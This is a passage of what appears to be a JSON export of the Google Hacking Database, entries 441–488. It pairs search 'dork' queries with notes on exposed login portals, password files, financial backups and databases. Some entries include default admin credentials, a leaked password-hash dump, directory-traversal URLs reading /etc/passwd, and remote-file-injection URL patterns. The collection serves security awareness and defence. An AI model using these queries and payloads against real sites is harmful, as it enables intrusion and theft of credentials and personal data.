        "link": "https://www.exploit-db.com/ghdb/441/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22ITS+System+Information%22+%22Please+log+on+to+the+SAP+System%22", 
        "shortDescription": "intitle:\"ITS System Information\" \"Please log on to the SAP System\"", 
        "textualDescription": "Frontend for SAP Internet Transaction Server webgui service."
    }, 
    {
        "signatureReferenceNumber": "442", 
        "link": "https://www.exploit-db.com/ghdb/442/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=Login+(%22Powered+by+Jetbox+One+CMS+%E2%84%A2%22+%7C+%22Powered+by+Jetstream+%C2%A9+*%22)&num=100&hl=en&lr=&ie=UTF-8&safe=off&filter=0", 
        "shortDescription": "Login (\"Powered by Jetbox One CMS \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2\" | \"Powered by Jetstream \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 *\")", 
        "textualDescription": "Jetbox is a content management systems (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF wich I think is overrated, but I will mention here:http://www.securityfocus.com/bid/10858/discussion/The file holding the password is called: \"http://.../includes/general_settings.inc.php\"It does come with default passwords and that is allways a security risk. The administration is available via /admin/Username: admin, Password: admin1 ."
    }, 
    {
        "signatureReferenceNumber": "443", 
        "link": "https://www.exploit-db.com/ghdb/443/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=LeapFTP+intitle%3A%22index.of.%2F%22+sites.ini+modified&btnG=Search", 
        "shortDescription": "LeapFTP intitle:\"index.of./\" sites.ini modified", 
        "textualDescription": "The LeapFTP client configuration file \"sites.ini\" holds the login credentials for those sites in plain text. The passwords seems to be encrypted."
    }, 
    {
        "signatureReferenceNumber": "444", 
        "link": "https://www.exploit-db.com/ghdb/444/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3ALogin+1%261+Webmailer&btnG=Google+Search", 
        "shortDescription": "intitle:Login * Webmailer", 
        "textualDescription": "1&1 Webmail login portals. This is made by a german company called Internet United active in the hosting providers area. They have a server login product wich can be found by GooglingThis is all not very exiting as there have been no vulnerabilities reported on this software yet."
    }, 
    {
        "signatureReferenceNumber": "445", 
        "link": "https://www.exploit-db.com/ghdb/445/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=inurl%3A%22gs%2Fadminlogin.aspx%22", 
        "shortDescription": "inurl:\"gs/adminlogin.aspx\"", 
        "textualDescription": "GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example: option value=\"E:\\GRADESPEED\\DRHARMONWKELLEYELEMENTARY\\|Dr H. W K. E.|101\">Dr ..."
    }, 
    {
        "signatureReferenceNumber": "446", 
        "link": "https://www.exploit-db.com/ghdb/446/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=%22phone++*+*+*%22+%22address+*%22+%22e-mail%22+intitle:%22curriculum+vitae%22", 
        "shortDescription": "\"phone  * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"", 
        "textualDescription": "This search gives hounderd of existing curriculum vitae with names and adress. An attacker could steal identity if there is an SSN in the document."
    }, 
    {
        "signatureReferenceNumber": "447", 
        "link": "https://www.exploit-db.com/ghdb/447/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=intitle:Novell+WebAccess&ie=UTF-8&oe=UTF-8intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", 
        "shortDescription": "intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", 
        "textualDescription": "search to show online Novell Groupwise web access portals."
    }, 
    {
        "signatureReferenceNumber": "448", 
        "link": "https://www.exploit-db.com/ghdb/448/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?num=100&q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22", 
        "shortDescription": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", 
        "textualDescription": "search for phpMyAdmin installations that are configured to run the MySQL database with root priviledges."
    }, 
    {
        "signatureReferenceNumber": "449", 
        "link": "https://www.exploit-db.com/ghdb/449/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+Gallery+v1.4.4%22", 
        "shortDescription": "\"Powered by Gallery v1.4.4\"", 
        "textualDescription": "http://www.securityfocus.com/bid/10968/discussion/\"A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. \""
    }, 
    {
        "signatureReferenceNumber": "450", 
        "link": "https://www.exploit-db.com/ghdb/450/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3AQDF+QDF", 
        "shortDescription": "Quicken data files", 
        "textualDescription": "The QDATA.QDF file (found sometimes in zipped \"QDATA\" archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc. This search has only a couple hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy and suggests to backup your data online."
    }, 
    {
        "signatureReferenceNumber": "451", 
        "link": "https://www.exploit-db.com/ghdb/451/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&q=filetype%3Aini+wcx_ftp", 
        "shortDescription": "filetype:ini wcx_ftp", 
        "textualDescription": "This searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future."
    }, 
    {
        "signatureReferenceNumber": "452", 
        "link": "https://www.exploit-db.com/ghdb/452/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?&q=%224images+Administration+Control+Panel%22", 
        "shortDescription": "4images Administration Control Panel", 
        "textualDescription": "4images Gallery - 4images is a web-based image gallery management system. The 4images administration control panel let you easily modify your galleries."
    }, 
    {
        "signatureReferenceNumber": "453", 
        "link": "https://www.exploit-db.com/ghdb/453/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=intitle%3Aindex.of+%2FAlbumArt_&btnG=Google-Suche&meta=", 
        "shortDescription": "intitle:index.of /AlbumArt_", 
        "textualDescription": "Directories containing commercial music.AlbumArt_{.*}.jpg are download/create by MS-Windows Media Player in music directory."
    }, 
    {
        "signatureReferenceNumber": "454", 
        "link": "https://www.exploit-db.com/ghdb/454/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Arobpoll.cgi+filetype%3Acgi&btnG=Search", 
        "shortDescription": "inurl:robpoll.cgi filetype:cgi", 
        "textualDescription": "robpoll.cgi is used to administrate polls.The default password used for adding polls is 'robpoll'.  All of the results should look something like this: \"http://www.example.com/robpoll.cgi?start\". An attacker may change robpoll.cgi pointing to admin  like this: \"http://www.example.com/robpoll.cgi?admin\"."
    }, 
    {
        "signatureReferenceNumber": "455", 
        "link": "https://www.exploit-db.com/ghdb/455/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=%28+filetype%3Amail+%7C+filetype%3Aeml+%7C+filetype%3Ambox+%7C+filetype%3Ambx+%29+intext%3Apassword%7Csubject+&btnG=Google-Suche&meta=", 
        "shortDescription": "( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject", 
        "textualDescription": "storing emails in your webtree isnt a good idea.with this search google will show  files containing emails like mail,eml,mbox or mbx with the keywords\"password\" or \"subject\" in the mail data."
    }, 
    {
        "signatureReferenceNumber": "456", 
        "link": "https://www.exploit-db.com/ghdb/456/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&q=filetype%3Aqbb+qbb", 
        "shortDescription": "filetype:qbb qbb", 
        "textualDescription": "This search will show QuickBooks Bakup Files. Quickbook is financial accounting software so storing these files in a webtree is not a smart idea."
    }, 
    {
        "signatureReferenceNumber": "457", 
        "link": "https://www.exploit-db.com/ghdb/457/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=filetype%3Abkf+bkf&meta=", 
        "shortDescription": "filetype:bkf bkf", 
        "textualDescription": "This search will show backupfiles for xp/2000 machines.Of course these files could contain nearly everything, depending on the user selection and they can also be password protected."
    }, 
    {
        "signatureReferenceNumber": "458", 
        "link": "https://www.exploit-db.com/ghdb/458/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=inurl%3A%22plog%2Fregister.php%22", 
        "shortDescription": "inurl:\"plog/register.php\"", 
        "textualDescription": "pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites running it. The installation documents clearly warn about removing files after installation for security purposes:\"If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php.\"This search finds that register.php form of course :)Below is some more general information about pLog.Vendor site: hxxp://www.plogworld.org/Admin portals http://sitename/plog/admin.phpInstallation wizard: http://sitename/plog/wizard.phpConfig file (mysql db pass): http://sitename/plog/config/config.properties.phpTemp files: http://sitename/plog/tmp/Gallery files: http://sitename/plog/gallery/Blog search engine: http://www.plogworld.org/ploogle/"
    }, 
    {
        "signatureReferenceNumber": "459", 
        "link": "https://www.exploit-db.com/ghdb/459/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=link%3Ahttp%3A%2F%2Fwww.toastforums.com%2F&btnG=Google+Search", 
        "shortDescription": "link:http://www.toastforums.com/", 
        "textualDescription": "Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem is in the install documentation (quoting):-- start quote --2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name. -- end quote --This search finds sites running Toast Forum by using the LINK: operator. Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table \"tstdb_Member\". It looks like this:\"ID\" \"FName\" \"LName\" \"Username\" \"Password\" \"Email\" \"HideEmail\" \"ICQ\" \"Homepage\" \"Signature\" \"IP\" \"Skin\" \"IncludeSignature\" \"NotifyDefault\" \"PostCount\" \"LastLoginDate\" \"LastPostDate\"Passwords are encrypted with the RC4 algoritm, so an attacker would find cracking them is (more) difficult (than usual)."
    }, 
    {
        "signatureReferenceNumber": "460", 
        "link": "https://www.exploit-db.com/ghdb/460/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=databasetype.+Code+:+80004005.+Error+Description+:&num=100&hl=en&lr=&ie=UTF-8&safe=off&start=0&sa=N", 
        "shortDescription": "snitz! forums db path error", 
        "textualDescription": "snitz forums uses a microsoft access databases for storage and the default name is \"Snitz_forums_2000.mdb\". The installation recommends changing both the name and the path. If only one is changed this database error occurs.  An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads."
    }, 
    {
        "signatureReferenceNumber": "461", 
        "link": "https://www.exploit-db.com/ghdb/461/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+Ikonboard+3.1.1%22", 
        "shortDescription": "\"Powered by Ikonboard 3.1.1\"", 
        "textualDescription": "IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.htmlThe bug was fixed in 3.1.2."
    }, 
    {
        "signatureReferenceNumber": "462", 
        "link": "https://www.exploit-db.com/ghdb/462/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=inurl%3Asnitz_forums_2000.mdb", 
        "shortDescription": "inurl:snitz_forums_2000.mdb", 
        "textualDescription": "The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says:  \"it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name.\"Of course, we know readme's are for lamers.. right admins ?[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERSMEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]1,1,\"adminadmin\",\"58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e\",\"yourmail@server.com\",\" \",\" \",\"\",\"\",1,1,1,3,\" \",\" \",\" \",\"20030918120147\",2,\"20030918120207\",\"20030918120224\",\"Forum Admin\",\"10.xx.xx.72\",0,0,1,\"000.000.000.000\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\" \",\" \",\"\",\"\",\" \",\"\",\"\",\"\",\"\",1(data xx'd at some points) The password hash value is a SHA256 encoded string (with no salting). Every attacker knows they can be broken with a dictionary attack using a very simpel perl or C program.http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt"
    }, 
    {
        "signatureReferenceNumber": "463", 
        "link": "https://www.exploit-db.com/ghdb/463/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&q=inurl%3A%2Fcgi-bin%2Findex.cgi+inurl%3Atopics+inurl%3Aviewcat%3D+%2Bintext%3A%22WebAPP%22+-site%3Aweb-app.org", 
        "shortDescription": "WebAPP directory traversal", 
        "textualDescription": "WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCredits goes to PhTeam for discovering this vulnerability."
    }, 
    {
        "signatureReferenceNumber": "464", 
        "link": "https://www.exploit-db.com/ghdb/464/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=filetype%3Ardp+rdp", 
        "shortDescription": "filetype:rdp rdp", 
        "textualDescription": "These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another windows computer using the RDP protocols."
    }, 
    {
        "signatureReferenceNumber": "465", 
        "link": "https://www.exploit-db.com/ghdb/465/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=filetype%3Areg+%22Terminal+Server+Client%22", 
        "shortDescription": "filetype:reg \"Terminal Server Client\"", 
        "textualDescription": "These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses."
    }, 
    {
        "signatureReferenceNumber": "466", 
        "link": "https://www.exploit-db.com/ghdb/466/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=inurl:%22nph-proxy.cgi%22+%22Start+browsing+through+this+CGI-based+proxy%22&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"", 
        "textualDescription": "Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.Web crackers are a distinct breed, and many do not comfort well with the draconian measures that many other crackers take, such as port and service scanning, the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with the only viable option to come in contact with a large number of proxies being to use public proxy lists. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.Luckily google gives them another option, if they are smart enough to find it.CGI-proxy ( http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the inprudent few who leave it open can quickly be seperated from the wise masses.CGI-proxy's default page contains the text, as you can see in the demo on their site:\"Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine.\"The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"More results can be obtained by admitting the \"inurl:nph-proxy.cgi\" constraint, but much more trash is generated as well."
    }, 
    {
        "signatureReferenceNumber": "467", 
        "link": "https://www.exploit-db.com/ghdb/467/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of+*%22+inurl%3A%22my+shared+folder%22+size+modified&btnG=Search", 
        "shortDescription": "intitle:\"Index of *\" inurl:\"my shared folder\" size modified", 
        "textualDescription": "These are index pages of \"My Shared Folder\". Sometimes they contain juicy stuff like mp3's or avi files. Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue."
    }, 
    {
        "signatureReferenceNumber": "468", 
        "link": "https://www.exploit-db.com/ghdb/468/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=inurl%3A%22%2Fbecommunity%2Fcommunity%2Findex.php%3Fpageurl%3D%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8", 
        "shortDescription": "E-market remote code execution", 
        "textualDescription": "E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL] For more information read this:http://echo.or.id/adv/adv06-y3dips-2004.txt Author: y3dipsDate: Sept, 7th 2004Location: Indonesian, Jakarta"
    }, 
    {
        "signatureReferenceNumber": "469", 
        "link": "https://www.exploit-db.com/ghdb/469/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Apot+inurl%3Ajohn.pot+&btnG=Google+Search", 
        "shortDescription": "filetype:pot inurl:john.pot", 
        "textualDescription": "John the Ripper is a popular cracking program every hacker knows. It's results are stored in a file called john.pot.This search finds such results files, currently only one. Also No results for the distributed john version (djohn.pot) today :)PS: This was posted to the \"fun\" forum, so don't take this too seriously !"
    }, 
    {
        "signatureReferenceNumber": "470", 
        "link": "https://www.exploit-db.com/ghdb/470/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Agallery+inurl%3Asetup+%22Gallery+configuration%22&btnG=Search", 
        "shortDescription": "Gallery configuration setup files", 
        "textualDescription": "Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.We call it Gallery in Setup mode :)"
    }, 
    {
        "signatureReferenceNumber": "471", 
        "link": "https://www.exploit-db.com/ghdb/471/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+inurl%3A%22email.xls%22+&btnG=Search", 
        "shortDescription": "filetype:xls inurl:\"email.xls\"", 
        "textualDescription": "Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses."
    }, 
    {
        "signatureReferenceNumber": "472", 
        "link": "https://www.exploit-db.com/ghdb/472/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Apdb+pdb+backup+%28Pilot+%7C+Pluckerdb%29+&btnG=Google+Search", 
        "shortDescription": "filetype:pdb pdb backup (Pilot | Pluckerdb)", 
        "textualDescription": "Hotsync database files can be found using \"All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your \"x:\\palm\\{username}\\backup\"The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).Currently we don't know of a program to \"read\" these binary files."
    }, 
    {
        "signatureReferenceNumber": "473", 
        "link": "https://www.exploit-db.com/ghdb/473/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=filetype%3Apl+%22Download%3A+SuSE+Linux+Openexchange+Server+CA%22+%0D%0A+%0D%0A&btnG=Google-Suche&meta=", 
        "shortDescription": "filetype:pl \"Download: SuSE Linux Openexchange Server CA\"", 
        "textualDescription": "this search will get you on the web administration portal of linux open exchange servers."
    }, 
    {
        "signatureReferenceNumber": "474", 
        "link": "https://www.exploit-db.com/ghdb/474/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=intitle%3A%22dreambox+web%22+&btnG=Google-Suche&meta=", 
        "shortDescription": "intitle:\"dreambox web\"", 
        "textualDescription": "this search will show web administration interfaces of linux dream boxes.The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc."
    }, 
    {
        "signatureReferenceNumber": "475", 
        "link": "https://www.exploit-db.com/ghdb/475/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=%22create+the+Super+User%22+%22now+by+clicking+here%22", 
        "shortDescription": "PHP-Nuke - create super user right now !", 
        "textualDescription": "PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:\"Welcome to PHP-Nuke!Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE.\""
    }, 
    {
        "signatureReferenceNumber": "476", 
        "link": "https://www.exploit-db.com/ghdb/476/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&q=filetype%3Aasp+DBQ%3D%22+%26+Server.MapPath%28%22*.mdb%22%29", 
        "shortDescription": "filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\")", 
        "textualDescription": "This search finds sites using Microsoft Access databases, by looking for the the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse."
    }, 
    {
        "signatureReferenceNumber": "477", 
        "link": "https://www.exploit-db.com/ghdb/477/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22TUTOS+Login%22", 
        "shortDescription": "intitle:\"TUTOS Login\"", 
        "textualDescription": "TUTOS stands for \"The Ultimate Team Organization Software.\" This search finds the login portals to TUTOS.Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. It is said that with the username linus and the password guest you can see what it looks like when your logged in. This is unconfirmed as of now."
    }, 
    {
        "signatureReferenceNumber": "478", 
        "link": "https://www.exploit-db.com/ghdb/478/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Login+to+Usermin%22+inurl%3A20000", 
        "shortDescription": "\"Login to Usermin\" inurl:20000", 
        "textualDescription": "Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators."
    }, 
    {
        "signatureReferenceNumber": "479", 
        "link": "https://www.exploit-db.com/ghdb/479/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&q=filetype%3Alit+lit+%28books%7Cebooks%29", 
        "shortDescription": "filetype:lit lit (books|ebooks)", 
        "textualDescription": "Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)"
    }, 
    {
        "signatureReferenceNumber": "480", 
        "link": "https://www.exploit-db.com/ghdb/480/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+*%3A+newtelligence%22+%28%22dasBlog+1.6%22%7C+%22dasBlog+1.5%22%7C+%22dasBlog+1.4%22%7C%22dasBlog+1.3%22%29&btnG=Search", 
        "shortDescription": "\"Powered *: newtelligence\" (\"dasBlog 1.6\"| \"dasBlog 1.5\"| \"dasBlog 1.4\"|\"dasBlog 1.3\")", 
        "textualDescription": "DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.More:http://www.securityfocus.com/bid/11086/discussion/"
    }, 
    {
        "signatureReferenceNumber": "481", 
        "link": "https://www.exploit-db.com/ghdb/481/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&q=inurl%3A%22%2Fnames.nsf%3FOpenDatabase%22+-inurl%3Agov", 
        "shortDescription": "Lotus Domino address books", 
        "textualDescription": "This search will return any Lotus Domino address books which may be open to the public. This can contain a lot of detailed personal info you don't want to fall in the hands of your competitors or hackers. Most of them are password protected."
    }, 
    {
        "signatureReferenceNumber": "482", 
        "link": "https://www.exploit-db.com/ghdb/482/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3A%22Login+-+powered+by+Easy+File+Sharing+Web+Server%22+&btnG=Google+Search", 
        "shortDescription": "intitle:\"Login - powered by Easy File Sharing Web Server\"", 
        "textualDescription": "Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.)\". More information at: http://www.securityfocus.com/bid/11034/discussion/An attacker can reportedly bypass the authentication by entering the the name of the virtual folder directly."
    }, 
    {
        "signatureReferenceNumber": "483", 
        "link": "https://www.exploit-db.com/ghdb/483/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Tomcat+Server+Administration%22", 
        "shortDescription": "intitle:\"Tomcat Server Administration\"", 
        "textualDescription": "This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server."
    }, 
    {
        "signatureReferenceNumber": "484", 
        "link": "https://www.exploit-db.com/ghdb/484/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=Admin+intitle%3A%22eZ+publish+administration%22", 
        "shortDescription": "ez Publish administration", 
        "textualDescription": "Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.Vendor site: http://www.ez.no/Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodifiedDepending on the version two queries can usedAdmin intitle:\"eZ publish administration\"intitle:\"Login\" \"Welcome to eZ publish administration\"Crosssite Scriting, Information Disclosure, Pathdisclosure available on older versions"
    }, 
    {
        "signatureReferenceNumber": "485", 
        "link": "https://www.exploit-db.com/ghdb/485/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=inurl%3Aadministrator+%22welcome+to+mambo%22", 
        "shortDescription": "inurl:administrator \"welcome to mambo\"", 
        "textualDescription": "Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications. Continue reading for a detailed feature list.Vendor: http://www.mamboserver.com/Cross Site Scripting and SQL injection exist in some versions 4.5 current version is 4.5.1RC3 Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&sbm=bid&submit=Search%21&metaname=alldoc"
    }, 
    {
        "signatureReferenceNumber": "486", 
        "link": "https://www.exploit-db.com/ghdb/486/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=%22Powered+by+DCP-Portal+v5.5%22", 
        "shortDescription": "\"Powered by DCP-Portal v5.5\"", 
        "textualDescription": "DCP-Portal is more a community system than a CMS - it nevertheless calls itsself CMS. They have never seen a real CMS. Version 5.5 is vulnerable sql injection.Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&sbm=bid&submit=Search%21&metaname=alldoc"
    }, 
    {
        "signatureReferenceNumber": "487", 
        "link": "https://www.exploit-db.com/ghdb/487/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=inurl%3A%22typo3%2Findex.php%3Fu%3D%22+-demo", 
        "shortDescription": "inurl:\"typo3/index.php?u=\" -demo", 
        "textualDescription": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.Vendor: http://www.typo3.com/Vulns: http://search.securityfocus.com/swsearch?query=Typo3&sbm=bid&submit=Search%21&metaname=alldoc"
    }, 
    {
        "signatureReferenceNumber": "488", 
        "link": "https://www.exploit-db.com/ghdb/488/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=intitle%3Aindex.of+%28inurl%3Afileadmin+%7C+intitle%3Afileadmin%29", 
        "shortDescription": "intitle:index.of (inurl:fileadmin | intitle:fileadmin)", 
        "textualDescription": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on.  Normally no sensitive data will be stored here except the one made available in restricted areas.Unprotected fileadmin directories can be found by an attacker using this query.Vendor: http://www.typo3.com/"
